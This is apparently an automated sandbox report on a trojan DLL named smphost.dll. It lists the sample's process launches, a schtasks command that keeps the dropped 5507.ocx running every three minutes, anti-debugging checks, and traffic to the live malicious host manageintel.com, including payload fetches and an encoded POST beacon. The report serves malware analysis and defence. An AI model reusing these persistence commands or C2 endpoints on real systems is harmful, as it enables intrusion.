Source: smphost.dll |
Virustotal: Detection: 8% |
Perma Link |
Source: http://manageintel.com/WUzZRUBQje/Auth.php |
Avira URL Cloud: Label: malware |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: certificate valid |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EED8A FindFirstFileExW, |
0_2_6E9EED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CED8A FindFirstFileExW, |
25_2_6F6CED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: the.earth.li |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 93.93.131.124 187 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
|
Source: unknown |
Network traffic detected: HTTP traffic on port 49835 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49835 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49839 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49839 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49840 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49840 |
Source: Joe Sandbox View |
ASN Name: ITLDC-NLUA ITLDC-NLUA |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: Joe Sandbox View |
IP Address: 93.93.131.124 93.93.131.124 |
Source: global traffic |
TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49832 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49831 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49830 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49838 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49837 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49836 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49832 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49833 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49830 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49831 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49838 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49837 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49836 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49833 |
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml |
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe |
String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml |
Source: unknown |
HTTP traffic detected: POST /WUzZRUBQje/Auth.php HTTP/1.1User-Agent: Windows-AzureAD-Authentication-Provider/11.0Host: manageintel.comContent-Length: 549Content-Type: application/x-www-form-urlencodedAccept-Language: en-USData Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4a 64 54 41 35 63 43 39 79 56 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 57 6e 42 4d 4d 6c 70 74 63 53 74 6e 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJJdTA5cC9yViIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWWnBMMlptcStnPT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0= |
Source: unknown |
DNS traffic detected: queries for: manageintel.com |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache |
Source: unknown |
HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2 |
Source: smphost.dll |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9F3EB6 |
0_2_6E9F3EB6 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E8C90 |
0_2_6E9E8C90 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6D3EB6 |
25_2_6F6D3EB6 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C8C90 |
25_2_6F6C8C90 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: String function: 6E9E9960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: String function: 6F6C9960 appears 34 times |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Section loaded: sfc.dll |
Jump to behavior |
Source: Joe Sandbox View |
Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E |
Source: smphost.dll |
Virustotal: Detection: 8% |
Source: smphost.dll |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: C:\Windows\System32\loaddll32.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: unknown |
Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076 |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp |
Jump to behavior |
Source: classification engine |
Classification label: mal88.troj.evad.winDLL@19/7@5/2 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
0_2_6E9E8630 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Source: C:\Windows\SysWOW64\WerFault.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Mutant created: \Sessions\1\BaseNamedObjects\computer |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: smphost.dll |
Static PE information: certificate valid |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT |
Source: smphost.dll |
Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata |
Source: smphost.dll |
Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata |
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Jump to dropped file |
Source: C:\Windows\SysWOW64\regsvr32.exe |
File created: C:\ProgramData\6\5507.ocx |
Jump to dropped file |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx |
Source: unknown |
Network traffic detected: HTTP traffic on port 49835 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49835 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49839 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49839 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49840 -> 32710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 32710 -> 49840 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\WerFault.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604 |
Thread sleep time: -30000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008 |
Thread sleep time: -54000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Last function: Thread delayed |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Last function: Thread delayed |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\loaddll32.exe |
API coverage: 6.8 % |
Source: C:\Windows\SysWOW64\regsvr32.exe |
API coverage: 6.3 % |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process information queried: ProcessInformation |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EED8A FindFirstFileExW, |
0_2_6E9EED8A |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CED8A FindFirstFileExW, |
25_2_6F6CED8A |
Source: C:\Windows\System32\loaddll32.exe |
Thread delayed: delay time: 120000 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Thread delayed: delay time: 30000 |
Jump to behavior |
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG |
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW, |
0_2_6E9E9CF7 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EFE17 GetProcessHeap, |
0_2_6E9EFE17 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h] |
0_2_6E9E1710 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h] |
0_2_6E9E1490 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h] |
0_2_6E9E83B0 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h] |
0_2_6E9EC865 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h] |
0_2_6E9EE9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h] |
25_2_6F6C1710 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h] |
25_2_6F6C1490 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h] |
25_2_6F6C83B0 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h] |
25_2_6F6CE9B4 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h] |
25_2_6F6CC865 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Process queried: DebugPort |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_6E9E9AED |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E9EC0A3 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_6E9E9839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
25_2_6F6C9AED |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
25_2_6F6C9839 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
25_2_6F6CC0A3 |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: the.earth.li |
|
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 185.14.31.158 32710 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Network Connect: 93.93.131.124 187 |
Jump to behavior |
Source: C:\Windows\SysWOW64\regsvr32.exe |
Domain query: manageintel.com |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 |
Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E9658 cpuid |
0_2_6E9E9658 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_6E9E99A8 |
Source: C:\Windows\System32\loaddll32.exe |
Code function: 0_2_6E9E8630 DllInstall,FormatMessageA,TextOutW,TextOutA,FormatMessageW,CoInitialize,OleInitialize,CoCreateInstance,CoGetCallerTID,FlattenPath,CreatePopupMenu,GetProductInfo,SetFileAttributesW,CharNextW,SHGetThreadRef,DceErrorInqTextA,GetConsoleCP,UuidCreate,GetMessageTime,GetVersion,GetPriorityClass,GetProcessId,IsTokenRestricted,RevertToSelf,RpcExceptionFilter,CveEventWrite,CoCancelCall,CoTaskMemAlloc,GetSidIdentifierAuthority,DisableThreadLibraryCalls,IsValidAcl,IsValidSid,CreateMutexExW,SHStrDupW,SHStrDupA,DuplicateIcon, |
0_2_6E9E8630 |